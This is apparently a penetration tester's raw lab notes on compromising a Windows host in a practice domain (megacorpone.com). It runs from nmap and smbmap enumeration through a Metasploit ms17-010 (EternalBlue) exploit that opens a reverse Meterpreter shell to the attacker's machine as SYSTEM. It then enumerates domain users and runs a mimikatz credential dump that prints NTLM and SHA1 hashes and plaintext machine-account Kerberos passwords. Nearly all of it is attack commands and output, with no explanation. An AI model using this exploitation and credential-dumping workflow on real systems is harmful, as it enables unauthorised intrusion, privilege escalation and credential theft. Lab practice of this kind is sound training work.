MCO: 26
[pg nmap regular:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 10 Enterprise N 2016 LTSB 14393 microsoft-ds (workgroup: MCO)
smbmap for shares:
smbmap -u 'kali' -p '' -H lepton.pg
[+] Guest session IP: lepton.pg:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
check smb-vulns:
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
double-checking…
msf5 auxiliary(admin/smb/ms17_010_command) > run
[*] 172.16.10.26:445 - Target OS: Windows 10 Enterprise N 2016 LTSB 14393
[*] 172.16.10.26:445 - Built a write-what-where primitive...
[+] 172.16.10.26:445 - Overwrite complete... SYSTEM session obtained!
[+] 172.16.10.26:445 - Service start timed out, OK if running a command or non-service executable...
[*] 172.16.10.26:445 - checking if the file is unlocked
[*] 172.16.10.26:445 - Getting the command output...
[*] 172.16.10.26:445 - Executing cleanup...
[+] 172.16.10.26:445 - Cleanup was successful
[+] 172.16.10.26:445 - Command completed successfully!
[*] 172.16.10.26:445 - Output for "net group "Domain Admins" /domain":
The request will be processed at a domain controller for domain megacorpone.com.
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator agrofield hax
wsus-srv
The command completed successfully.
metasploit almost always works so…
msf5 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 172.16.10.233:4444
[*] 172.16.10.26:445 - Target OS: Windows 10 Enterprise N 2016 LTSB 14393
[*] 172.16.10.26:445 - Built a write-what-where primitive...
[+] 172.16.10.26:445 - Overwrite complete... SYSTEM session obtained!
[*] 172.16.10.26:445 - Selecting PowerShell target
[*] 172.16.10.26:445 - Executing the payload...
[+] 172.16.10.26:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (180291 bytes) to 172.16.10.26
[*] Meterpreter session 1 opened (172.16.10.233:4444 -> 172.16.10.26:50435) at 2020-05-22 23:37:10 -0700
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
hashed
post
C:\Windows\system32>net user /domain
net user /domain
The request will be processed at a domain controller for domain megacorpone.com.
User accounts for \\pdc.megacorpone.com
-------------------------------------------------------------------------------
Administrator agrofield DefaultAccount
fgodden Guest hax
jruiz jsheer krbtgt
mcarlow msmith rsauns
rsauns-adm thudson trivera
wadler wsus-srv
domain admins
agrofield
hax
rdp users
rsauns
dump creds
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 2427714 (00000000:00250b42)
Session : Interactive from 0
User Name : Administrator
Domain : WS02
Logon Server : WS02
Logon Time : 5/23/2020 4:19:47 AM
SID : S-1-5-21-4259402461-1448266967-4130189754-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : WS02
* NTLM : afa568b4714dd373633fa1cba6c9045d
* SHA1 : a06d969c7ac9c00116d41b4c5337edd38a27963b
tspkg :
wdigest :
* Username : Administrator
* Domain : WS02
* Password : (null)
kerberos :
* Username : Administrator
* Domain : WS02
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 2405899 (00000000:0024b60b)
Session : Interactive from 0
User Name : Administrator
Domain : WS02
Logon Server : WS02
Logon Time : 5/23/2020 4:17:57 AM
SID : S-1-5-21-4259402461-1448266967-4130189754-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : WS02
* NTLM : afa568b4714dd373633fa1cba6c9045d
* SHA1 : a06d969c7ac9c00116d41b4c5337edd38a27963b
tspkg :
wdigest :
* Username : Administrator
* Domain : WS02
* Password : (null)
kerberos :
* Username : Administrator
* Domain : WS02
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 138071 (00000000:00021b57)
Session : Interactive from 1
User Name : msmith
Domain : MCO
Logon Server : PDC
Logon Time : 10/11/2018 8:53:16 AM
SID : S-1-5-21-2755992450-1486063684-1672926321-1603
msv :
[00000003] Primary
* Username : msmith
* Domain : MCO
* NTLM : 4c8066ce21d3ee98e32f7bc32ab1268b
* SHA1 : 2b512a6b86ae42229f39315cc685334f889b78c4
* DPAPI : 5906dbf640b458753ecf85d44e53c82b
tspkg :
wdigest :
* Username : msmith
* Domain : MCO
* Password : (null)
kerberos :
* Username : msmith
* Domain : MEGACORPONE.COM
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 10/11/2018 8:53:10 AM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 63688 (00000000:0000f8c8)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 10/11/2018 8:53:10 AM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WS02$
* Domain : MCO
* NTLM : 2c07585025c02f7196a9d2a176f9c054
* SHA1 : 9e2566ba70d220ad338551f413f8ea6553c5893e
tspkg :
wdigest :
* Username : WS02$
* Domain : MCO
* Password : (null)
kerberos :
* Username : WS02$
* Domain : megacorpone.com
* Password : Y3o<m+nURxZT=/,"Xn(hU_Y);TEH3LzPz4U1dJ&xB7/rROPrRi ";6@]LeC$&;_=6Hf=b*Cu?.Zta_PT9M$hi0c"4h(G^DTB7DPQC*ny7@!(=!,P^+%he'Q$
ssp :
credman :
Authentication Id : 0 ; 63446 (00000000:0000f7d6)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 10/11/2018 8:53:10 AM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WS02$
* Domain : MCO
* NTLM : f818a5d0424a1f8c42d58cb043561dc0
* SHA1 : 76eade68d33942d51cce1a0e4ce68ee3b8f61a72
tspkg :
wdigest :
* Username : WS02$
* Domain : MCO
* Password : (null)
kerberos :
* Username : WS02$
* Domain : megacorpone.com
* Password : <RSa]N_9]z<J>8zT]02\o$GYE6-(1&DGVZV17RUSkB(og]X5E>]0l8^He^:ffc4,jU`hHE_e[c<;gRn+@E1OZKO8Lx3=h'j,WE/%<`?XCZPZ>+e=)+O^5s.$
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WS02$
Domain : MCO
Logon Server : (null)
Logon Time : 10/11/2018 8:53:10 AM
SID : S-1-5-20
msv :
[00000003] Primary
* Username : WS02$
* Domain : MCO
* NTLM : f818a5d0424a1f8c42d58cb043561dc0
* SHA1 : 76eade68d33942d51cce1a0e4ce68ee3b8f61a72
tspkg :
wdigest :
* Username : WS02$
* Domain : MCO
* Password : (null)
kerberos :
* Username : ws02$
* Domain : MEGACORPONE.COM
* Password : <RSa]N_9]z<J>8zT]02\o$GYE6-(1&DGVZV17RUSkB(og]X5E>]0l8^He^:ffc4,jU`hHE_e[c<;gRn+@E1OZKO8Lx3=h'j,WE/%<`?XCZPZ>+e=)+O^5s.$
ssp :
credman :
Authentication Id : 0 ; 34748 (00000000:000087bc)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 10/11/2018 8:53:09 AM
SID :
msv :
[00000003] Primary
* Username : WS02$
* Domain : MCO
* NTLM : f818a5d0424a1f8c42d58cb043561dc0
* SHA1 : 76eade68d33942d51cce1a0e4ce68ee3b8f61a72
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WS02$
Domain : MCO
Logon Server : (null)
Logon Time : 10/11/2018 8:53:09 AM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WS02$
* Domain : MCO
* Password : (null)
kerberos :
* Username : ws02$
* Domain : MEGACORPONE.COM
* Password : (null)
ssp :
credman :